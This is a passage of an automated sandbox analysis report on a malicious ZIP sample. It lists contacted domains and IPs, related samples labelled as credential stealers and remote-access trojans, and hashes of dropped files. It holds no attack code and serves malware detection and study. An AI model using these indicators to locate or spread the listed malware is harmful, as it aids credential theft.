                                                                                                                                                                                            http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabledfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-firefox.exe, 00000003.00000003.1822094452.000001CA0C047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1798915283.000001CA198CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://mozilla.org/#/properties/enrollmentEndDatefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://login.microsoftonline.comfirefox.exe, 00000003.00000003.1671012859.000001CA154DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1677981793.000001CA0EA4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://x1.c.lencr.org/0firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://x1.i.lencr.org/0firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000003.00000003.1479097899.000001CA157DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnoredfirefox.exe, 00000003.00000003.1628297834.000001CA1B43E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://mozilla.org/#/properties/outcomesfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://www.urwpp.defirefox.exe, 00000003.00000003.2043753666.000001CA7CF8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://identity.mozilla.com/apps/relayfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://mozilla.org/03xfirefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2firefox.exe, 00000003.00000003.1720770465.000001CA13657000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000003.00000003.2023659253.000001CA08592000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://screenshots.firefox.com/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017734041.000001CA0B145000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://truecolors.firefox.com/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/adfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
151.101.129.91 | services.addons.mozilla.org | United States | 54113 | FASTLYUS | false
216.58.206.36 | www.google.com | United States | 15169 | GOOGLEUS | false
34.117.188.166 | contile.services.mozilla.com | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
35.201.103.21 | normandy-cdn.services.mozilla.com | United States | 15169 | GOOGLEUS | false
34.120.208.123 | telemetry-incoming.r53-2.services.mozilla.com | United States | 15169 | GOOGLEUS | false
34.149.100.209 | prod.remote-settings.prod.webservices.mozgcp.net | United States | 2686 | ATGS-MMD-ASUS | false
34.107.243.93 | push.services.mozilla.com | United States | 15169 | GOOGLEUS | false
208.68.240.115 | boinc.berkeley.edu | United States | 25 | UCBUS | false
34.107.221.82 | prod.detectportal.prod.cloudops.mozgcp.net | United States | 15169 | GOOGLEUS | false
35.244.181.201 | prod.balrog.prod.cloudops.mozgcp.net | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
104.238.61.8 | rosettahome.top | United States | 8100 | ASN-QUADRANET-GLOBALUS | false
35.190.72.216 | prod.classify-client.prod.webservices.mozgcp.net | United States | 15169 | GOOGLEUS | false
34.160.144.191 | prod.content-signature-chains.prod.webservices.mozgcp.net | United States | 2686 | ATGS-MMD-ASUS | false
IP
192.168.2.17
192.168.2.16
192.168.2.13
127.0.0.1

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1591248
Start date and time: 2025-01-14 20:44:28 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 527.zip
Detection: MAL
Classification: mal80.evad.winZIP@59/102@76/18
EGA Information:
• Successful, ratio: 60%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .zip
                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.206, 66.102.1.84, 142.250.186.46, 142.250.181.238, 142.250.184.195, 142.250.186.42, 142.250.185.138, 142.250.185.170, 142.250.184.202, 142.250.186.170, 142.250.74.202, 142.250.186.74, 142.250.186.138, 142.250.185.202, 172.217.18.106, 142.250.186.106, 142.250.185.234, 216.58.206.42, 142.250.181.234, 172.217.23.106, 172.217.16.138, 142.250.184.206, 44.233.129.8, 52.41.23.50, 44.242.27.200, 142.250.185.174, 172.217.16.202, 172.217.16.206, 142.250.186.78, 2.22.61.59, 2.22.61.56, 172.217.18.14, 142.250.185.131, 216.58.206.46, 142.250.184.238, 142.250.185.238, 216.58.212.174, 172.217.18.110, 216.58.206.78, 52.149.20.212, 204.79.197.200, 23.1.33.206, 40.126.31.73, 51.104.15.253, 204.79.197.222, 150.171.84.254, 13.107.246.254
                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fp.msedge.net, p-ring.msedge.net, ciscobinary.openh264.org, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, redirector.gvt1.com, login.live.com, r.bing.com, update.googleapis.com, safebrowsing.googleapis.com, www.gstatic.com, clients1.google.com, www.bing.com, shavar.prod.mozaws.net, accounts.google.com, ogads-pa.googleapis.com, detectportal.prod.mozaws.net, t-ring.msedge.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, location.services.mozilla.com, browser.pipe.aria.microsoft.com
                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target firefox.exe, PID 876 because there are no executed function
                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
14:45:16 | API Interceptor | 1x Sleep call for process: firefox.exe modified
14:45:39 | API Interceptor | 154x Sleep call for process: powershell.exe modified
14:46:31 | API Interceptor | 17x Sleep call for process: .exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                  • 157.240.252.35
                                                                                                                                                                                                                                                                                                                                  https://ctrk.klclick2.com/l/01JHDZ0909KRHM82JGE0C594Y8_0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 157.240.0.35
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
                                                                                                                                                                                                                                                                                                                                  gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                                  • 35.244.181.201
                                                                                                                                                                                                                                                                                                                                  • 34.149.100.209
                                                                                                                                                                                                                                                                                                                                  • 34.160.144.191
                                                                                                                                                                                                                                                                                                                                  • 151.101.129.91
                                                                                                                                                                                                                                                                                                                                  • 34.120.208.123
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy) | random.exe | malicious | Credential Flusher
 | random.exe | malicious | Credential Flusher
 | rpDOUhuBC5.exe | malicious | Credential Flusher
 | rpDOUhuBC5.exe | malicious | Credential Flusher
 | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine
 | NetFxRepairTools.msi | malicious | Quasar
 | nM0h824cc3.exe | malicious | Credential Flusher
 | nM0h824cc3.exe | malicious | Credential Flusher
 | gTU8ed4669.exe | malicious | Credential Flusher
 | gTU8ed4669.exe | malicious | Credential Flusher
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):7598
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.167157763659895
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:J4LMXWQDcbhbVbTbfbRbObtbyEl7n7JA6UnSrDtTEd/S99:iwHcNhnzFSJSLnSrDhEd/u
                                                                                                                                                                                                                                                                                                                                                      MD5:E1B2CA78DB1A9A36CDF2441696E60E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:D9991451B8FAC9BD1B02F8575CE99EA4C06F90A3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:162B80A73715BB3878E53C4643BEEFC1C7FA4AE64132F62BB3E616D4AA83D979
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EF2B7B68DDF66F653046031F5D28F3EE6223715C438E2B4B07958D702FCD886FEEE43893E02D3BEE84C5FFB06A31A8BFB67AF059D047A9344EBCCB35218D7CA
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"type":"uninstall","id":"4b44fe99-4fd5-4fa1-b5fd-6fadbb324285","creationDate":"2025-01-14T21:14:57.615Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"413174e6-2d70-4d17-b528-bf49e920b3c6","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":4,"vendor":"GenuineIntel","name":"I
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):7598
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.167157763659895
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:J4LMXWQDcbhbVbTbfbRbObtbyEl7n7JA6UnSrDtTEd/S99:iwHcNhnzFSJSLnSrDhEd/u
                                                                                                                                                                                                                                                                                                                                                      MD5:E1B2CA78DB1A9A36CDF2441696E60E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:D9991451B8FAC9BD1B02F8575CE99EA4C06F90A3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:162B80A73715BB3878E53C4643BEEFC1C7FA4AE64132F62BB3E616D4AA83D979
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EF2B7B68DDF66F653046031F5D28F3EE6223715C438E2B4B07958D702FCD886FEEE43893E02D3BEE84C5FFB06A31A8BFB67AF059D047A9344EBCCB35218D7CA
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"type":"uninstall","id":"4b44fe99-4fd5-4fa1-b5fd-6fadbb324285","creationDate":"2025-01-14T21:14:57.615Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"413174e6-2d70-4d17-b528-bf49e920b3c6","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":4,"vendor":"GenuineIntel","name":"I
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):48000
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0765103817949555
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:nYWEvtAHkWWLhv3OdB3NKe2frRJv5FBYoNNZyopbjoRjdvRrardFcKzRYRWmHQgr:nYWEvtAHkWu3OdB3NKe2flJnBYoUibj6
                                                                                                                                                                                                                                                                                                                                                      MD5:757BBCCFC61CBFEE4F51DD799B46F731
                                                                                                                                                                                                                                                                                                                                                      SHA1:C14D68D8C3F32CB4C9C99281C44EF6CB5CA9F22E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E0D1A1C376DDCF46F8963BF9E339D608CD2038EBB6E112F5D16DE4A6E304DB93
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EBDEEB5F7C0A1BBFD9E90C4B58E3AA60A611C988B6B51421768FF3D84875C3D46EA711B384FAC15A4F9158125BF1E5B7B2D69A74E68FC9D97966D4E849003DCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PSMODULECACHE.J.....N.UQ..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet............z..K...C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\PSReadLine.psm1........PSConsoleHostReadLine........Get-PSReadLineOption........Set-PSReadLineKeyHandler........Get-PSReadLineKeyHandler........Set-PSReadLineOption........Remove-PSReadLineKeyHandler.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption....
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):14696
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.463035616536978
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:ZhjrpWMuHhQdhNpvYm6XhqaJrYXeRriGR5axlqmke:7rAMWgr6Xhqa16e9Ra
                                                                                                                                                                                                                                                                                                                                                      MD5:7D9CE106981CB93235E2EBF155D405B4
                                                                                                                                                                                                                                                                                                                                                      SHA1:C603414A1E83C1319B919D58B885763795C25D7A
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F8491C3162E961343CB2C3712A75D2BABA339C0D66B74B7EEA74BEE79373BFFF
                                                                                                                                                                                                                                                                                                                                                      SHA-512:4C236EF9F58F43AD38909C4182E00C9EF7AF9EE905A39407ECB85FC514675B7F4EFD981EFBBAB7E18507719774556500C52B805DCB73E8D9ED29D8C041DF05C1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:@...e................................................@..........H...............o..b~.D.poM...4..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
